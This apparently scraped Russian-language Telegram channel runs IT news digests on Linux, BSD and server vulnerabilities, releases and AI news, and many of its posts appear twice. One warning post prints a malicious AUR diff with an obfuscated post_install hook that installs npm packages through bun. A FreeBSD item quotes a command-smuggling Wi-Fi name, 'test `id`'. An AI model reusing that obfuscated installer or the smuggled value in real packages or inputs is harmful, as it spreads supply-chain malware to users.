Computers were a mistake
Тем временем вышел Zed 1.0. Так как я его периодически потыкиваю, ибо он чуть-чуть недотягивал до удобства VSCode'а, решил потыкать и в этот раз. Из замеченного: - Появилась возможность вывести закрепленные вкладки в отдельную строку, выше обычных вкладок.…
Кстати, забавностей с Zed прибыло.
Курсор на строчке с первым параметром, но подсвечивает уже второй параметр в сигнатуре функции.
И это и правильно, и неправильно одновременно. Правильно с позиции разбора кода (запятая есть разделитель параметров), а неправильно с UX позиции (гошка позволяет форматировать код таким образом, и удобнее было бы видеть подсвеченным первый параметр).
Также у меня появился канал в MAX, присоединяйтесь!
Курсор на строчке с первым параметром, но подсвечивает уже второй параметр в сигнатуре функции.
И это и правильно, и неправильно одновременно. Правильно с позиции разбора кода (запятая есть разделитель параметров), а неправильно с UX позиции (гошка позволяет форматировать код таким образом, и удобнее было бы видеть подсвеченным первый параметр).
Также у меня появился канал в MAX, присоединяйтесь!
🌚5👎1
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (28 апреля - 5 мая).
- В Ubuntu намечена интеграция AI. С одной стороны неплохое начинание, с другой все мы помним про интеграцию рекламы и следилок в Unity, поэтому к этой штуке надо относиться с осторожностью. Но за что можно сказать "спасибо" - все ИИшности будут исполняться только локально.
- Представлен GTK2-NG, форк библиотеки GTK2. У меня с этим тулкитом связаны самые приятные воспоминания, начиная от тем rezlooks и заканчивая софтом на Go и GTK2, который я писал. Простой, но в то же время фичастый, хоть и не всегда удобный (привет, rich text). Посмотрим, во что это выльется.
- Notepad++ теперь доступен на macOS как нативное приложение. Возрадуйтесь все те, кому TextEdit.app (встроенный текстовый редактор в macOS) было мало, теперь вы можете при переезде с винды пользовать что-то привычное! Однако не все так радужно, на самом деле, так как, во-первых, плагины надо портировать, а во-вторых, автор Notepad++ потребовал переименовать порт для macOS из-за нарушения товарного знака, так что в скором времени все вернется на круги своя и вы будете скачивать сторонний редактор, который, возможно, похож на Notepad++, и даже имеет схожий функционал, но называется по-другому. А вообще к автору порта есть вопросы, так как Дон Хо (автор Notepad++) утверждает, что код был написан ИИшечкой и в принципе какого-то отношения к Notepad++ не имеет.
- Очередной отчет о развитии KDE. Из интересного - поддержка портала "background apps" (приложение может убрать окна и оставить свой значок в трее), улучшения в контроле доступа к устройствам ввода, улучшено автоматическое управление яркостью экрана.
Подборочка взломов и уязвимостей:
- В Python-пакет elementary-data, имеющий 1.1 млн загрузок в месяц, внедрён вредоносный код. Нет, это не про ElementaryOS, а другая элементарная штука, связанная с ИИшечкой и базами данных. Так что одни выдыхают, а другие в очередной раз в мыле из-за уязвимости в шаге Github Actions.
- Copy Fail - уязвимость в ядре Linux, позволяющая получить root в большинстве дистрибутивов. Вкраце - вас могут поиметь в любом дистрибутиве и получить root-доступ, но требуется локальный доступ к компу. Проблема проявляется начиная с ядра Linux 4.14 (2017 год) ¯\_(ツ)_⧸¯. Так что как увидите обновление - сразу обновляйтесь, мало ли.
- Релизы дистров и ОСей: Fedora Linux 44, Bazzite 44, Proxmox Backup Server 4.2.
Также у меня появился канал в MAX, присоединяйтесь!
- В Ubuntu намечена интеграция AI. С одной стороны неплохое начинание, с другой все мы помним про интеграцию рекламы и следилок в Unity, поэтому к этой штуке надо относиться с осторожностью. Но за что можно сказать "спасибо" - все ИИшности будут исполняться только локально.
- Представлен GTK2-NG, форк библиотеки GTK2. У меня с этим тулкитом связаны самые приятные воспоминания, начиная от тем rezlooks и заканчивая софтом на Go и GTK2, который я писал. Простой, но в то же время фичастый, хоть и не всегда удобный (привет, rich text). Посмотрим, во что это выльется.
- Notepad++ теперь доступен на macOS как нативное приложение. Возрадуйтесь все те, кому TextEdit.app (встроенный текстовый редактор в macOS) было мало, теперь вы можете при переезде с винды пользовать что-то привычное! Однако не все так радужно, на самом деле, так как, во-первых, плагины надо портировать, а во-вторых, автор Notepad++ потребовал переименовать порт для macOS из-за нарушения товарного знака, так что в скором времени все вернется на круги своя и вы будете скачивать сторонний редактор, который, возможно, похож на Notepad++, и даже имеет схожий функционал, но называется по-другому. А вообще к автору порта есть вопросы, так как Дон Хо (автор Notepad++) утверждает, что код был написан ИИшечкой и в принципе какого-то отношения к Notepad++ не имеет.
- Очередной отчет о развитии KDE. Из интересного - поддержка портала "background apps" (приложение может убрать окна и оставить свой значок в трее), улучшения в контроле доступа к устройствам ввода, улучшено автоматическое управление яркостью экрана.
Подборочка взломов и уязвимостей:
- В Python-пакет elementary-data, имеющий 1.1 млн загрузок в месяц, внедрён вредоносный код. Нет, это не про ElementaryOS, а другая элементарная штука, связанная с ИИшечкой и базами данных. Так что одни выдыхают, а другие в очередной раз в мыле из-за уязвимости в шаге Github Actions.
- Copy Fail - уязвимость в ядре Linux, позволяющая получить root в большинстве дистрибутивов. Вкраце - вас могут поиметь в любом дистрибутиве и получить root-доступ, но требуется локальный доступ к компу. Проблема проявляется начиная с ядра Linux 4.14 (2017 год) ¯\_(ツ)_⧸¯. Так что как увидите обновление - сразу обновляйтесь, мало ли.
- Релизы дистров и ОСей: Fedora Linux 44, Bazzite 44, Proxmox Backup Server 4.2.
Также у меня появился канал в MAX, присоединяйтесь!
👍4
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие 3 недели (6 - 25 мая). Эти 3 недели, возможно, из-за весеннего обострения, оказались богаты на всякие уязвимости и утечки.
Скоро ЧМ по футболу, поэтому сроки поставки свежих дайджестов где-то до конца июня могут быть увеличены. Работа, понимаете ли.
1/2
- Уязвимости в Nix и Lix, позволяющие поднять привилегии в системе. Пофиксили рекурсивную распаковку, докинули проверочек и валидаций. Классика.
- Уязвимость в CPU AMD Zen 2, позволяющая повысить привилегии и обойти изоляцию виртуальных машин. Если вы обновляли микрокод на десктопе и ноуте (drk.xfz Threadripper) - вы в безопасности, а вот пользователи EPYC должны дождаться пропатченного ядра/Xen и фикситься софтово.
- Подборочка уязвимостей в ядре Linux: Dirty Frag, Fragnesia, DirtyDecrypt, уязвимость в pidfd, PinTheft, GRO Frag. Предложен killswitch для экстренного отключения уязвимой функциональности в ядре Linux.
- Уязвимость в системном вызове execve, предоставляющая root-доступ во FreeBSD. Ошибка математики привела к тому, что копировалось больше данных, чем нужно, что позволяло выполнить в итоге свой код. Также во фряхе устранили еще несколько уязвимостей, все они либо про переполнение буфера/стека, либо про кривую математику, либо классический use after free.
- Уязвимости в dnsmasq, допускающие отравление DNS-кэша и выполнение кода с правами root. Классика - переполнение буфера, чтение за пределами буфера из-за недостаточной валидации. Обновляйтесь, если пользуете.
- Уязвимость в Exim, приводящая к удалённому выполнению кода на сервере. Проблема проявляется у фанатов швабодки, собирающих Exim с GNUTLS, и является обычным use after free, который можно эксплуатировать для выполнения кода на сервере с правами процесса.
- Обновление nginx 1.31.0 с устранением RCE-уязвимости, эксплуатируемой через HTTP-запрос. Все из-за rewrite модуля, который выделял память на URL с неэкранированными спецсимволами, а помещал туда уже экранированные (и, соответственно, строка становилась длиннее). Присутствует уязвимость, внимание, с версии 0.6.27 от марта 2008 года, так что поздравляем ее с совершеннолетием :). Также в этой версии есть несколько классических уязвимостей вида use after free, чтение за пределами выделенного буфера и т.д. Ну и сразу же опять фикс переполнения буфера в rewrite модуле.
- QEMUtiny - уязвимости в QEMU, позволяющие получить доступ к хост-окружению из гостевой системы. Ничего нового - чтение за пределами выделенного буфера. Но сейчас есть эксплоит только для последней версии (11.0.0), однако исследователи, обнаружившие уязвимость, утверждают, что можно с помощью сканирования памяти процесса сделать его универсальным (но им, видимо, лень). В общем, откатывайтесь или обновляйтесь :).
- Компрометация GitHub-токена Grafana Labs привела к утечке закрытого кода. Код увели, разрабов шантажировани, платить разрабы отказались. Ждем появление кода на всяких хацкерских форумах в даркнете?
- Во FreeBSD устранено 4 уязвимости, позволяющие поднять привилегии, и одна удалённая root-уязвимость. Опять же, классика - отсутствие экранирования спецсимволов (и ведь пришло кому-то в голову точку доступа к вифи называть как "test `id`"!), use-after-free, отсутствие валидации и переполнения буферов. Обновляйтесь, в общем, все фиксы уже доступны к накатыванию.
Также у меня появился канал в MAX, присоединяйтесь!
Скоро ЧМ по футболу, поэтому сроки поставки свежих дайджестов где-то до конца июня могут быть увеличены. Работа, понимаете ли.
1/2
- Уязвимости в Nix и Lix, позволяющие поднять привилегии в системе. Пофиксили рекурсивную распаковку, докинули проверочек и валидаций. Классика.
- Уязвимость в CPU AMD Zen 2, позволяющая повысить привилегии и обойти изоляцию виртуальных машин. Если вы обновляли микрокод на десктопе и ноуте (drk.xfz Threadripper) - вы в безопасности, а вот пользователи EPYC должны дождаться пропатченного ядра/Xen и фикситься софтово.
- Подборочка уязвимостей в ядре Linux: Dirty Frag, Fragnesia, DirtyDecrypt, уязвимость в pidfd, PinTheft, GRO Frag. Предложен killswitch для экстренного отключения уязвимой функциональности в ядре Linux.
- Уязвимость в системном вызове execve, предоставляющая root-доступ во FreeBSD. Ошибка математики привела к тому, что копировалось больше данных, чем нужно, что позволяло выполнить в итоге свой код. Также во фряхе устранили еще несколько уязвимостей, все они либо про переполнение буфера/стека, либо про кривую математику, либо классический use after free.
- Уязвимости в dnsmasq, допускающие отравление DNS-кэша и выполнение кода с правами root. Классика - переполнение буфера, чтение за пределами буфера из-за недостаточной валидации. Обновляйтесь, если пользуете.
- Уязвимость в Exim, приводящая к удалённому выполнению кода на сервере. Проблема проявляется у фанатов швабодки, собирающих Exim с GNUTLS, и является обычным use after free, который можно эксплуатировать для выполнения кода на сервере с правами процесса.
- Обновление nginx 1.31.0 с устранением RCE-уязвимости, эксплуатируемой через HTTP-запрос. Все из-за rewrite модуля, который выделял память на URL с неэкранированными спецсимволами, а помещал туда уже экранированные (и, соответственно, строка становилась длиннее). Присутствует уязвимость, внимание, с версии 0.6.27 от марта 2008 года, так что поздравляем ее с совершеннолетием :). Также в этой версии есть несколько классических уязвимостей вида use after free, чтение за пределами выделенного буфера и т.д. Ну и сразу же опять фикс переполнения буфера в rewrite модуле.
- QEMUtiny - уязвимости в QEMU, позволяющие получить доступ к хост-окружению из гостевой системы. Ничего нового - чтение за пределами выделенного буфера. Но сейчас есть эксплоит только для последней версии (11.0.0), однако исследователи, обнаружившие уязвимость, утверждают, что можно с помощью сканирования памяти процесса сделать его универсальным (но им, видимо, лень). В общем, откатывайтесь или обновляйтесь :).
- Компрометация GitHub-токена Grafana Labs привела к утечке закрытого кода. Код увели, разрабов шантажировани, платить разрабы отказались. Ждем появление кода на всяких хацкерских форумах в даркнете?
- Во FreeBSD устранено 4 уязвимости, позволяющие поднять привилегии, и одна удалённая root-уязвимость. Опять же, классика - отсутствие экранирования спецсимволов (и ведь пришло кому-то в голову точку доступа к вифи называть как "test `id`"!), use-after-free, отсутствие валидации и переполнения буферов. Обновляйтесь, в общем, все фиксы уже доступны к накатыванию.
Также у меня появился канал в MAX, присоединяйтесь!
👍4
2/2
Но хватит про очень плохое:
- Проект PHP перешёл на лицензию BSD-3 и изъял из обращения лицензию PHP License. Теперь можно спокойно использовать “PHP” где угодно, возрадуйтесь! Ну или нет ¯⧹_(ツ)_⧸¯.
- Доменная зона DE на несколько часов была выведена из строя из-за DNSSEC. Похожее было и с .ru в январе 2024 года. Еще одно напоминание о том, что криптография - это, конечно, хорошо, но требует очень аккуратного обращения.
- В Debian утверждена обязательная поддержка воспроизводимых сборок пакетов. Теперь если пользователь не может собрать бинарно идентичный пакет - он не будет принят в состав репозитория. Безусловно, это очень хорошо, особенно когда у нас через день что-то компрометируют и вставляют закладки.
- Новый reCAPTCHA не позволит пройти проверку на Android-устройствах без сервисов Google. Так как теперь все будет проходить через Play Integrity API, то всякие LineageOS без гуглосервисов не прокатят, а статус сертифицированного легко потерять при установке кастомной прошивки. Посмотрим, чем это все кончится.
- В Python 3.14.5 из-за утечек памяти возвращён старый сборщик мусора. И в 3.15 он не вернется. Ждем антидота от "укуса хромом", то есть от пожирания памяти.
- Adobe Lightroom CC при помощи AI адаптирован для работы в Linux через Wine. Адаптирован, конечно же, не адобой, а энтузиастами, которые циклично заставляли ИИшечку запускать оный в Wine, анализировать ошибки и дампы, писать заглушки или реализации необходимых функций, инжектить DLLки. С одной стороны - хорошее начинание, с другой - работать точно будет очень так себе в итоге. Когда же Adobe сделает нативные версии?
- Создан виртуальный музей операционных систем. Похоже, я знаю, на что я залипну в ближайшие выходные 😏 .
- Опубликован офисный пакет ONLYOFFICE 9.4 с обновлением лицензии на код. Теперь там плюс-минус все стандартно, фонд СПО может быть доволен, а европейские политики могут клепануть свой Euro-Office. Драма закончилась.
- Нарушение AGPL производителем 3D-принтеров Bambu Lab и создание форка Bambu Studio. Антитивоизация as it is - создали форк софта от Bambu для взаимодействия с их принтерами, только теперь под защитой фонда СПО, ибо нефиг. Есть подозрение, что Bambu Lab также прилетит хороший такой иск за нарушение AGPLv3, готовим попкорн.
Релизы дистров и ОСей: OmniOS CE r151058 (на технологиях OpenSolaris), ToaruOS 2.3 (самобытная Unix-подобная ОС), OpenWrt 25.12.3, Ubuntu Touch 24.04-1.3, AGL UCB 21.0 (база для автомобилей), Debian 12.14 и 13.5, OpenBSD 7.9, Proxmox VE 9.2, Ubuntu Core 26, RHEL 10.2 и RHEL 9.8, TileOS 2.0 (debian с тайловыми WM), MX Linux 25.2.
Также у меня появился канал в MAX, присоединяйтесь!
Но хватит про очень плохое:
- Проект PHP перешёл на лицензию BSD-3 и изъял из обращения лицензию PHP License. Теперь можно спокойно использовать “PHP” где угодно, возрадуйтесь! Ну или нет ¯⧹_(ツ)_⧸¯.
- Доменная зона DE на несколько часов была выведена из строя из-за DNSSEC. Похожее было и с .ru в январе 2024 года. Еще одно напоминание о том, что криптография - это, конечно, хорошо, но требует очень аккуратного обращения.
- В Debian утверждена обязательная поддержка воспроизводимых сборок пакетов. Теперь если пользователь не может собрать бинарно идентичный пакет - он не будет принят в состав репозитория. Безусловно, это очень хорошо, особенно когда у нас через день что-то компрометируют и вставляют закладки.
- Новый reCAPTCHA не позволит пройти проверку на Android-устройствах без сервисов Google. Так как теперь все будет проходить через Play Integrity API, то всякие LineageOS без гуглосервисов не прокатят, а статус сертифицированного легко потерять при установке кастомной прошивки. Посмотрим, чем это все кончится.
- В Python 3.14.5 из-за утечек памяти возвращён старый сборщик мусора. И в 3.15 он не вернется. Ждем антидота от "укуса хромом", то есть от пожирания памяти.
- Adobe Lightroom CC при помощи AI адаптирован для работы в Linux через Wine. Адаптирован, конечно же, не адобой, а энтузиастами, которые циклично заставляли ИИшечку запускать оный в Wine, анализировать ошибки и дампы, писать заглушки или реализации необходимых функций, инжектить DLLки. С одной стороны - хорошее начинание, с другой - работать точно будет очень так себе в итоге. Когда же Adobe сделает нативные версии?
- Создан виртуальный музей операционных систем. Похоже, я знаю, на что я залипну в ближайшие выходные 😏 .
- Опубликован офисный пакет ONLYOFFICE 9.4 с обновлением лицензии на код. Теперь там плюс-минус все стандартно, фонд СПО может быть доволен, а европейские политики могут клепануть свой Euro-Office. Драма закончилась.
- Нарушение AGPL производителем 3D-принтеров Bambu Lab и создание форка Bambu Studio. Антитивоизация as it is - создали форк софта от Bambu для взаимодействия с их принтерами, только теперь под защитой фонда СПО, ибо нефиг. Есть подозрение, что Bambu Lab также прилетит хороший такой иск за нарушение AGPLv3, готовим попкорн.
Релизы дистров и ОСей: OmniOS CE r151058 (на технологиях OpenSolaris), ToaruOS 2.3 (самобытная Unix-подобная ОС), OpenWrt 25.12.3, Ubuntu Touch 24.04-1.3, AGL UCB 21.0 (база для автомобилей), Debian 12.14 и 13.5, OpenBSD 7.9, Proxmox VE 9.2, Ubuntu Core 26, RHEL 10.2 и RHEL 9.8, TileOS 2.0 (debian с тайловыми WM), MX Linux 25.2.
Также у меня появился канал в MAX, присоединяйтесь!
👍4
Доброго времени суток!
Дайджест откладывается до следующей недели, работка - она такая, перегружает иногда.
Пока предлагаю поофигевать с того, что у majordomo какая-то проблема, виртуалочки немного прилегли (как минимум у меня). Сетевые проблемы, говорят в саппорте.
Дайджест откладывается до следующей недели, работка - она такая, перегружает иногда.
Пока предлагаю поофигевать с того, что у majordomo какая-то проблема, виртуалочки немного прилегли (как минимум у меня). Сетевые проблемы, говорят в саппорте.
🫡2
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие 2 недели (26 мая - 7 июня).
Прошедшее время выдалось очень богатым на уязвимости, поэтому обновляйтесь как можно скорее. Лучше уж "не было печали - апдейтов накачали" и починиться за пару часов, чем ваши данные поимеют тем или иным способом.
- Расширение системной памяти через подкачку в видеопамяти NVIDIA. Если у вас есть дискретка от nVidia на ноутбуке и вы ей особо не пользуетесь, то вы можете через подкачку “расширить” размер доступной оперативки. Выглядит очень неплохо, если вам нужно много оперативки а она, скажем, распаяна.
- Немного приколов про использование ИИ: в jqwik добавлена скрытая деструктивная инструкция для AI-агентов, каталог GNOME Circle не будет принимать приложения, созданные с использованием AI, разработаны правила использования AI в проекте Rust, проблемы с соблюдением авторского права при переписывании ScanCode на Rust при помощи AI, Регрессии в rsync 3.4.3 и принятие изменений, подготовленных с использованием AI.
Подборка уязвимостей:
- Google случайно раскрыл детали неисправленной уязвимости в Chromium. Видимо, внутри гугля не смогли договориться, что это фича, а не баг, но на самом деле это оказалось багом. Ситуация забавная, пользователем хромого соболезную, ибо злоумышленники быстро возьмут это на вооружение.
- Уязвимости в Samba, допускающие удалённое выполнение кода в редких конфигурациях. Конфигурации-то редкие (использование скрипта для аутентификации и сервера печати), но баги стандартные - отсутствие экранирования спецсимволов. Не забудьте обновиться ASAP, если такое пользуете. Также там еще несколько уязвимостей устранили, включая DoS с помощью спецпакета UDP, так что не отмазывайтесь, а обновляйтесь.
- Уязвимости в Unbound, Kata-Containers, BIND, PostgreSQL, HPLIP, MongoDB, Rsync, 7-zip, Yelp, qSnapper и Suricata. Гонки, повышение привелегий, отсутствие валидации входящих данных, переполнение буфера, и, наверняка, use after free (в новости не написано). Классика жанра, обновляемся, если пользуете что-то из перечисленного.
- CIFSwitch - уязвимость в CIFS-подсистеме ядра Linux, позволяющая получить права root. Отсутствие валидации входящих данных. Пока что доступен только патч в ядро, нового релиза оного с фиксом пока нет.
- Макрософаг опять сделал РЕШЕТО - Fedora Linux помог выявить проблему с безопасностью в почтовом клиенте Outlook. Вкраце - аутглюк даже при установленной галке использования STARTTLS для POP3/IMAP его (STARTTLS) не использовал и соединение было нешифрованным. Известно о таком поведении как минимум начиная с Outlook 2007.
- Уязвимость в libinput, позволяющая повысить свои привилегии в системе. Угадайте, в чем дело? 1... 2... 3... И? Угадали! Отсутствует экранирование спецсимволов! Прототип эксплоита уже доступен, поэтому обновляйтесь как только соберут для вашего дистрибутива.
- Атака на реализации HTTP/2, приводящая к исчерпанию доступной памяти. Проблеме подвержены nginx, apache, IIS (который от макрософага), Envoy, Cloudflare Pingora. Там все просто - внутри сжатых заголовков ссылка на значение, которое пустое, но при обработке которого выделяется определенное количество байт в любом случае. Для apache есть фикс, но еще не зарелижен, IIS и Pingora пока не пофикшены, остальное уже зачинено.
- В Chrome устранено 429 уязвимостей, а в Android - 124. Там короче вообще жесть, а 3 проблемы даже сдали Qualcomm, так как косяки - они.
- Релизы дистров и ОСей: AlmaLinux 9.8 и 10.2, Rocky Linux 9.8 и 10.2, NixOS 26.05, Armbian 26.5, Ubuntu Sway Remix 26.04 LTS.
Также у меня появился канал в MAX, присоединяйтесь!
Прошедшее время выдалось очень богатым на уязвимости, поэтому обновляйтесь как можно скорее. Лучше уж "не было печали - апдейтов накачали" и починиться за пару часов, чем ваши данные поимеют тем или иным способом.
- Расширение системной памяти через подкачку в видеопамяти NVIDIA. Если у вас есть дискретка от nVidia на ноутбуке и вы ей особо не пользуетесь, то вы можете через подкачку “расширить” размер доступной оперативки. Выглядит очень неплохо, если вам нужно много оперативки а она, скажем, распаяна.
- Немного приколов про использование ИИ: в jqwik добавлена скрытая деструктивная инструкция для AI-агентов, каталог GNOME Circle не будет принимать приложения, созданные с использованием AI, разработаны правила использования AI в проекте Rust, проблемы с соблюдением авторского права при переписывании ScanCode на Rust при помощи AI, Регрессии в rsync 3.4.3 и принятие изменений, подготовленных с использованием AI.
Подборка уязвимостей:
- Google случайно раскрыл детали неисправленной уязвимости в Chromium. Видимо, внутри гугля не смогли договориться, что это фича, а не баг, но на самом деле это оказалось багом. Ситуация забавная, пользователем хромого соболезную, ибо злоумышленники быстро возьмут это на вооружение.
- Уязвимости в Samba, допускающие удалённое выполнение кода в редких конфигурациях. Конфигурации-то редкие (использование скрипта для аутентификации и сервера печати), но баги стандартные - отсутствие экранирования спецсимволов. Не забудьте обновиться ASAP, если такое пользуете. Также там еще несколько уязвимостей устранили, включая DoS с помощью спецпакета UDP, так что не отмазывайтесь, а обновляйтесь.
- Уязвимости в Unbound, Kata-Containers, BIND, PostgreSQL, HPLIP, MongoDB, Rsync, 7-zip, Yelp, qSnapper и Suricata. Гонки, повышение привелегий, отсутствие валидации входящих данных, переполнение буфера, и, наверняка, use after free (в новости не написано). Классика жанра, обновляемся, если пользуете что-то из перечисленного.
- CIFSwitch - уязвимость в CIFS-подсистеме ядра Linux, позволяющая получить права root. Отсутствие валидации входящих данных. Пока что доступен только патч в ядро, нового релиза оного с фиксом пока нет.
- Макрософаг опять сделал РЕШЕТО - Fedora Linux помог выявить проблему с безопасностью в почтовом клиенте Outlook. Вкраце - аутглюк даже при установленной галке использования STARTTLS для POP3/IMAP его (STARTTLS) не использовал и соединение было нешифрованным. Известно о таком поведении как минимум начиная с Outlook 2007.
- Уязвимость в libinput, позволяющая повысить свои привилегии в системе. Угадайте, в чем дело? 1... 2... 3... И? Угадали! Отсутствует экранирование спецсимволов! Прототип эксплоита уже доступен, поэтому обновляйтесь как только соберут для вашего дистрибутива.
- Атака на реализации HTTP/2, приводящая к исчерпанию доступной памяти. Проблеме подвержены nginx, apache, IIS (который от макрософага), Envoy, Cloudflare Pingora. Там все просто - внутри сжатых заголовков ссылка на значение, которое пустое, но при обработке которого выделяется определенное количество байт в любом случае. Для apache есть фикс, но еще не зарелижен, IIS и Pingora пока не пофикшены, остальное уже зачинено.
- В Chrome устранено 429 уязвимостей, а в Android - 124. Там короче вообще жесть, а 3 проблемы даже сдали Qualcomm, так как косяки - они.
- Релизы дистров и ОСей: AlmaLinux 9.8 и 10.2, Rocky Linux 9.8 и 10.2, NixOS 26.05, Armbian 26.5, Ubuntu Sway Remix 26.04 LTS.
Также у меня появился канал в MAX, присоединяйтесь!
Ради прикола попробовал в яндексовую Алису (с плюсом) запустить задачу: "напиши код на Go для обработки вебхуков от Vikunja и пересылки их в $MESSENGERNAME", где оные это тележенька, Макс, ntfy, mattermost, matrix, XMPP, nextcloud talk.
Результаты:
- Telegram: юзабельно
- Макс: нераспарсила что это и сгенерила какой-то рандомный отправщик в рандомный
- ntfy: юзабельно
- mattermost: юзабельно
- matrix: юзабельно
- XMPP: юзабельно
- nextcloud talk: юзабельно
Из спецэффектов: неправильная структура вебхука Vikunja, остальное выглядит вменяемо, для xmpp и matrix вполне нормально сформировала код отправки сообщений, используя правильные зависимости и структуру сообщения.
Скоро опусы с клавой станут не нужны? :)
Результаты:
- Telegram: юзабельно
- Макс: нераспарсила что это и сгенерила какой-то рандомный отправщик в рандомный
send-message какого-то com-домена.- ntfy: юзабельно
- mattermost: юзабельно
- matrix: юзабельно
- XMPP: юзабельно
- nextcloud talk: юзабельно
Из спецэффектов: неправильная структура вебхука Vikunja, остальное выглядит вменяемо, для xmpp и matrix вполне нормально сформировала код отправки сообщений, используя правильные зависимости и структуру сообщения.
Скоро опусы с клавой станут не нужны? :)
В списке рассылки AUR (Arch User Repository) идет активное обсуждение вредоносных коммитов, которые устанавливают в зависимости сборки - bun (js рантайм типа nodejs) и в postinstall скрипт вставляют установку вредоносов (типа пакетов js-digest, lockfile-js). Пока что известно (из списка рассылки) о почте 1 тысяче затронутых пакетов (а скорее всего их намного больше), поэтому если будете обновляться - посмотрите в PKGBUILD, чтобы не подтянуть вредоноса себе в систему.
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
😢2🫡1
Computers were a mistake
В списке рассылки AUR (Arch User Repository) идет активное обсуждение вредоносных коммитов, которые устанавливают в зависимости сборки - bun (js рантайм типа nodejs) и в postinstall скрипт вставляют установку вредоносов (типа пакетов js-digest, lockfile-js).…
Продолжаем нести вести с полей - теперь там небольшая обфускация через конкатенацию строк все того же bun:
+++ b/htbrowser-bin-deps.install
@@ -0,0 +1,3 @@
+post_install() {
+ $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d'
$'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73'
'n'"e"'x'"t""f"'i''l''e''-''j''s'
+}
❤4
Computers were a mistake
В списке рассылки AUR (Arch User Repository) идет активное обсуждение вредоносных коммитов, которые устанавливают в зависимости сборки - bun (js рантайм типа nodejs) и в postinstall скрипт вставляют установку вредоносов (типа пакетов js-digest, lockfile-js).…
Регистрацию в AUR отключили для чистки (и возможно выработки методов защиты).
🔥4
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (9 - 15 июня).
- Возрождение разработки Ubuntu MATE после ухода основателя проекта. Исошника для 26.04 не будет, но вы можете обновиться но "свеженький" MATE 1.28 через apt. Сейчас новая команда разработки дистра под руководством лидера Lubuntu разгребает ошибки.
- Альянс AOMedia объявил о стабилизации видеокодека AV2. Несмотря на внушительный список участников, в ближайшее время доступно будет только софтверный декодинг/энкодинг, поэтому бежать в новый формат смысла особого пока нет.
- Lets Encrypt ввёл запрет на выдачу сертификатов для стран под санкциями США. Уже в интернетах доступны размышления-скандалы по поводу Max, у которого уже отзывают серты, и что будет в принципе со всеми проектами из РФ. Попутно GlobalSign начал отзыв EV-сертификатов у компаний, находящихся под санкциями.
- Уязвимость в процессорах ARM, позволяющая обойти изоляцию виртуальных машин. Кратко - побег из курятника, то есть возможность из виртуалки записать данные в память хоста (ну а дальше все мы знаем - комбинируем уязвимости и вот у нас уже RCE из десятка оных). Затронуты всякие кортексы, неоверсы и олимпусы от nVidia. Патчи есть для ядра linux и Xen, но еще ни в один релиз патчи не вошли.
- Первый стабильный выпуск открытого офисного пакета Euro-Office. По сути пока это просто ребрендинг, но The Document Foundation уже пожурили их за продвижение макрософагского OOXML, а также за то, что назвались "первым открытым европейским офисным пакетом", ибо есть LibreOffice и OpenOffice.
- В Fedora выявлена подмена взломанного участника AI-агентом для продвижения сомнительных изменений. Тут прям драма в нескольких актах, почитайте, как злоумышленники могут подготавливать почву для своих козней. Более прекрасен, конечно же, факт разоблачения.
- Как я писал ранее, некие товарищи скомпрометировали 469 пакетов в репозитории AUR. Потом нашли еще некоторое количество пакетов. А сейчас зарегистрироваться там нельзя. Конечно же, количество пакетов, по ощущениям от переписки, превышает означенное число.
- Власти США предписали Anthropic приостановить доступ к AI-моделям Fable 5 и Mythos 5. Основная причина - модели могут искать уязвимости в софте. Однако, как заявляет Anthropic, другие модели, которые доступны сейчас, тоже могут это делать, и непонятно, почему ограничения коснулись конкретно их моделей. Пока они работают над восстановлением доступа с юридической стороны, можно попробовать взломать Пентагон с помощью Gemini
- Релиз ядра Linux 7.1. Из интересного: новый драйвер ntfsplus, первая стадия прекращения поддержки CPU i486, удаление старых Ethernet-адаптеров, протоколов и драйверов, удаление протоколов ISDN и AX.25, включение по умолчанию механизма Intel FRED, поддержка BPF-обработчиков в io_uring, оптимизация подсистемы подкачки, поддержка субпланировщиков в sched_ext, ввод/вывод в режиме zero-copy в драйвере ublk, ioctl-операция “shutdown” в Btrfs, динамическое переключение режима производительности в драйвере amd-pstate, поддержка xattr для Unix-сокетов.
- Релизы дистров и ОСей: Alpine Linux 3.24, GentleOS (с ретро GUI, для ОЧЕНЬ винтажных ПК), Proxmox Mail Gateway 9.1.
Также у меня появился канал в MAX, присоединяйтесь!
- Возрождение разработки Ubuntu MATE после ухода основателя проекта. Исошника для 26.04 не будет, но вы можете обновиться но "свеженький" MATE 1.28 через apt. Сейчас новая команда разработки дистра под руководством лидера Lubuntu разгребает ошибки.
- Альянс AOMedia объявил о стабилизации видеокодека AV2. Несмотря на внушительный список участников, в ближайшее время доступно будет только софтверный декодинг/энкодинг, поэтому бежать в новый формат смысла особого пока нет.
- Lets Encrypt ввёл запрет на выдачу сертификатов для стран под санкциями США. Уже в интернетах доступны размышления-скандалы по поводу Max, у которого уже отзывают серты, и что будет в принципе со всеми проектами из РФ. Попутно GlobalSign начал отзыв EV-сертификатов у компаний, находящихся под санкциями.
- Уязвимость в процессорах ARM, позволяющая обойти изоляцию виртуальных машин. Кратко - побег из курятника, то есть возможность из виртуалки записать данные в память хоста (ну а дальше все мы знаем - комбинируем уязвимости и вот у нас уже RCE из десятка оных). Затронуты всякие кортексы, неоверсы и олимпусы от nVidia. Патчи есть для ядра linux и Xen, но еще ни в один релиз патчи не вошли.
- Первый стабильный выпуск открытого офисного пакета Euro-Office. По сути пока это просто ребрендинг, но The Document Foundation уже пожурили их за продвижение макрософагского OOXML, а также за то, что назвались "первым открытым европейским офисным пакетом", ибо есть LibreOffice и OpenOffice.
- В Fedora выявлена подмена взломанного участника AI-агентом для продвижения сомнительных изменений. Тут прям драма в нескольких актах, почитайте, как злоумышленники могут подготавливать почву для своих козней. Более прекрасен, конечно же, факт разоблачения.
- Как я писал ранее, некие товарищи скомпрометировали 469 пакетов в репозитории AUR. Потом нашли еще некоторое количество пакетов. А сейчас зарегистрироваться там нельзя. Конечно же, количество пакетов, по ощущениям от переписки, превышает означенное число.
